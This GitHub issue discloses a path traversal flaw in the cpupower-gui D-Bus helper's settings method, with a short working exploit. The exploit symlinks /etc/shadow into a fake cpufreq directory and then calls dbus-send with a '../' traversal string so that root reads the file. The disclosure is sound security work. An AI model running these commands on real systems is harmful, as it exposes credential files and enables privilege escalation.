path traversal vulnerability in org.rnd2.cpupower_gui.helper.settings due to variant types
lindi2 opened this issue · comments
Type of the "cpu" argument in org.rnd2.cpupower_gui.helper.settings is not specific explicitly using the in_signature keyword argument of the decorator. The default type is a variant type which means that the method can be called such that "cpu" is actually a string. The string is then used to construct a file path that is then opened as root. This allows any user on the system to read the first line of any file on the system. Or it would, if "settings" method actually returned the settings (currently, it just prints it to stdout).
Here's an exploit example:
mkdir /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor /tmp/cpufreq
ln -s /etc/shadow /tmp/cpufreq/scaling_available_governors
dbus-send --system --dest=org.rnd2.cpupower_gui.helper --type=method_call --print-reply /org/rnd2/cpupower_gui/helper org.rnd2.cpupower_gui.helper.settings variant:string:0/../../../../../tmp
Similar problem also affects "update_cpu_settings" and allows any authorized user to write any file on the system.